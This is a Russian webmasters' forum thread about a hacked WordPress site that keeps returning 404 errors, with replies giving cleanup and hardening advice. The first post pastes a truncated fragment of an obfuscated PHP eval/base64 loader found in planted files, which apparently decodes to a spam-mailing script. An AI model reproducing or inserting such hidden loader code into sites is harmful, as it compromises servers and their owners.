WEBLEDI.RUВебледи Форум успешных женщин-вебмастеров
17 Январь 2017, 01:44:39 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.

Войти
Правила Реклама
 
5
10
15
Свежие ответы
от rusrob (Ищу копирайтера, редактора, контент-менеджера)
от rusrob (Контент, копирайтинг, переводы)
от Петрова (Новичку)
от Krok (Покупка-продажа)
от LISA7 (Наши сайты)
от vsemaykiadmin (CPA-сети)
от salemed (Социальные сети)
от Holly (Тизерные и баннерные сети)
от HostiMan (Хостинг)
от vuxaru (Пожелания к администрации форума)
от lana280479 (Работа и услуги)
от wellweb (Домены)
от vuxaru (Деловые предложения)
от Lakaire (Продвижение, SEO)
от anton77 (Обмен ссылками)
Свежие темы
Показать ещё
  Печать  
Страниц: 1
Автор

Тема: WP - Ошибка 404 и странные файлы  (Прочитано 1849 раз)

0 Пользователей и 1 Гость смотрят эту тему.
MechtaZ
Offline Offline

Сообщений: 233


в себя верю


Просмотр профиля
« : 17 Декабрь 2015, 23:31:14 »

Первый раз возникла такая странная проблема - после добавления новой записи через несколько часов сайт выдает ошибку 404. При этом главная страница отображается корректно, а вот при открытии записей или категорий - ошибка. Сделаю восстановление - работает. И так примерно раз в сутки.
Вычистила все не нужное, удалила плагины новые, проверила на вирусы и почистила. Ну уже все. Ан нет, проблема повторяется.

Сайт на WP тема Clear Line.

Раньше пользовалась этой темой, нравилось, проблем не возникало. Но потом сайт порушила и даже сравнить не могу. Но мне кажется, что вот таких странных файлов я там не видела:
cszfqoot.php
dmbmibdm.php
dzcm.php
и еще много подобных.

В самих файлах такое, примерно одинаковое, содержание

<?php eval(eval("\$_968e1414c4ac0572fb11d1e122a8ca8dacda4b6d1e177ccbfc911948 = \x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\"DQpzZXRfdGltZV9saW1pdCAoIDY2NjAwMCApOw0KQGlnbm9yZV91c2VyX2Fib3J0ICh0cnVlKTsNCg0KZnVuY3Rpb24gcmFuZG9tX3N0cmluZygkbGVuZ3RoKSB7DQogICAgJGtleSA9ICcnOw0KICAgICRrZXlzID0gcmFuZ2UoJ2EnLCAneicpOw0KDQogICAgZm9yICgkaSA9IDA7ICRpIDwgJGxlbmd0aDsgJGkrKykgew0KICAgICAgICAka2V5IC49ICRrZXlzW2FycmF5X3JhbmQoJGtleXMpXTsNCiAgICB9DQoNCiAgICByZXR1cm4gJGtleTsNCn0NCmRlZmluZSgnQ0ZHX05VTV9TT0NLRVRTJywgNjQpOw0KZGVmaW5lKCdDRkdfU09DS19USU1FT1VUJywgMzApOw0KZGVmaW5lKCdDRkdfU09DS19XT1JLX1RJTUUnLCAxMjApOw0KZGVmaW5lKCdTTVRQX1NUQVRFX1VOREVGJywgMCk7DQpkZWZpbmUoJ1NNVFBfU1RBVEVfQ09OTkVDVCcsIDEpOw0KZGVmaW5lKCdTTVRQX1NUQVRFX0hFTE8nLCAyKTsNCmRlZmluZSgnU01UUF9TVEFURV9NQUlMX0ZST00nLCAzKTsNCmRlZmluZSgnU01UUF9TVEFURV9SQ1BUX1RPJywgNCk7DQpkZWZpbmUoJ1NNVFBfU1RBVEVfREFUQScsIDUpOw0KZGVmaW5lKCdTTVRQX1NUQVRFX0NPTlRFTlQnLCA2KTsNCmRlZmluZSgnU01UUF9TVEFURV9RVUlUJywgNyk7DQpkZWZpbmUoJ1NNVFBfU1RBVFVTX1VOREVGJywgMCk7DQpkZWZpbmUoJ1NNVFBfU1RBVFVTX0xVQ0tZJywgMSk7DQpkZWZpbmUoJ1NNVFBfU1RBVFVTX1VOTFVDS1knLCAyKTsNCmRlZmluZSgnTUFJTF9TVEFUVVNfVU

Что это такое вообще? И что со всем этим делать? В замешательстве
Записан

Не теряйте меня до обеда, восполняю бессонные ночи. Сова, однако))
prikhodko_eu
Offline Offline

Пол: Женский
Сообщений: 2128



Просмотр профиля
« Ответ #1 : 18 Декабрь 2015, 00:16:09 »

Похоже на вирус. А точно возникает 404 ошибка? Так и написано?
Записан

prikhodko_eu
Offline Offline

Пол: Женский
Сообщений: 2128



Просмотр профиля
« Ответ #2 : 18 Декабрь 2015, 00:19:33 »

На всякий случай поставьте плагины защиты, которые смогут проверить, если кто-то заходил в админку. Смените пароли. Если есть логин admin - удалите насовсем и замените на другой с паролем в 20 знаков рандомных символов.
Обычно повторение каких-то странных явлений указывает на наличие шелла, при котором автоматически откатывается сайт. У меня такое было. При этом шелл украл все пароли и ходил даже на хостинг в админку. Блокировка по айпи не помогла - заходы и откаты стали производиться с моего айпи. Поэтому пришлось не просто чистить компьютер, а полностью переустанавливать ОС.
Записан

MechtaZ
Offline Offline

Сообщений: 233


в себя верю


Просмотр профиля
« Ответ #3 : 18 Декабрь 2015, 00:26:29 »

да, так и пишет 404

Если есть логин admin
ага, пароль сменила, а вот логин оставила

плагины защиты
спасибо, попробую

Кстати, вот попробовала удалить всю инфу из одного загадочного файла - на сайте ничего не изменилось. Т.е. на работу они не влияют?

« Последнее редактирование: 18 Декабрь 2015, 00:28:55 от MechtaZ » Записан

Не теряйте меня до обеда, восполняю бессонные ночи. Сова, однако))
prikhodko_eu
Offline Offline

Пол: Женский
Сообщений: 2128



Просмотр профиля
« Ответ #4 : 18 Декабрь 2015, 00:39:34 »

MechtaZ, удалите админа совсем, нового сделать - это минутное дело, и логин такой не будет проблем создавать. Многие программы уже заточены под этот логин, и взломать сайт несложно. Ломают же не с домашнего компьютера, а с выделенных серверов, где подобрать его можно в течение дня, если не раньше.
Но  ввашем случае, вероятно, не столько брутфорс, сколько доступ получили к файловой системе, а это значит с помощью шелла добрались до хостинг панели.
Записан

prikhodko_eu
Offline Offline

Пол: Женский
Сообщений: 2128



Просмотр профиля
« Ответ #5 : 18 Декабрь 2015, 00:41:09 »

MechtaZ, я не знаю, если честно, про файлы. Я не программист. Просто вот был такой опыт с шеллом, вот и делюсь.
Когда поставите защиту, смените тему на всякий случай. Если это бесплатная - в ней дыры могут быть.
Записан

MechtaZ
Offline Offline

Сообщений: 233


в себя верю


Просмотр профиля
« Ответ #6 : 18 Декабрь 2015, 01:03:21 »

Если это бесплатная
Ну вот никогда такого не было.  В замешательстве
Было, что и левые ссылки удаляла и некоторую зачистку делала. Но вот с этой ошибкой первый раз столкнулась.

Ну вот логин пароль поменяла, все странные файлы удалила (на работу сайта не повлияло, кстати), поставила защиту от несанкционированного входа и мониторинг.
Посмотрим, что это даст Обеспокоенный

prikhodko_eu, спасибо за подсказки дарю цветочек
Записан

Не теряйте меня до обеда, восполняю бессонные ночи. Сова, однако))
sputnik1818
Offline Offline

Сообщений: 398


Просмотр профиля
« Ответ #7 : 18 Декабрь 2015, 01:16:17 »

У вас вирус на блоге. Если кратко, то в файлы PHP встроен вредоносный зашифрованный код.
Что делать?
Во-первых, поменять логины и пароли администраторов. Я бы ещё сменил пароль почты и включил двухфакторную авторизацию, если выключена.
Во-вторых, поиском через терминал (если есть возможность) выяснил бы какие файлы заражены. Либо можно выкачать сайт и локально поискать по файлам.
В-третьих, закрыть сайт на техобслуживание. И удалить код из файлов вручную. Либо вначале удалить в локальной копии, а потом залить уже готовые файлы. Но сайт лучше прикрыть на это время, чтобы код не распространился - возможно, в нём содержится инфа, которая дописывается в другие файлы PHP.
Лишние подозрительные файлы естественно нужно удалять )

P.S. Чуть не забыл. Обычно этот код вписывает в ваши статьи/может комменты левые спам ссылки. Я бы ещё проверил изменямые под всеми админами статьи за последнее время (HTML код) на предмет левых ссылок

Ну как-то так  пиво
« Последнее редактирование: 18 Декабрь 2015, 01:21:13 от sputnik1818 » Записан

Правила форума
Форум передан новым владельцам:) Контакты их ищите на форуме.
MechtaZ
Offline Offline

Сообщений: 233


в себя верю


Просмотр профиля
« Ответ #8 : 18 Декабрь 2015, 01:27:49 »

sputnik1818, пойду застрелюсь пойду дальше ковыряться, спасибо и вам пиво

Записан

Не теряйте меня до обеда, восполняю бессонные ночи. Сова, однако))
Сергей Нижегородцев
Умная раскрутка сайтов белыми методами
Offline Offline

Пол: Мужской
Сообщений: 181


SEO-аудиты и раскрутка ИМ. Привет, девчонки!


Просмотр профиля WWW
« Ответ #9 : 29 Декабрь 2015, 13:36:48 »

MechtaZ, как успехи в борьбе с вредными скриптами, получилось?
Записан

Kimin
Offline Offline

Сообщений: 306


Просмотр профиля WWW
« Ответ #10 : 31 Декабрь 2015, 08:11:24 »

Обфусцированные коды - проклятие файлов WP в "бесплатных" красивых темах. Именно поэтому я пишу темы с нуля сам, облегчая сайт до минимума.
Записан

Страниц: 1
  Печать  
 
Перейти в:  

| Sitemap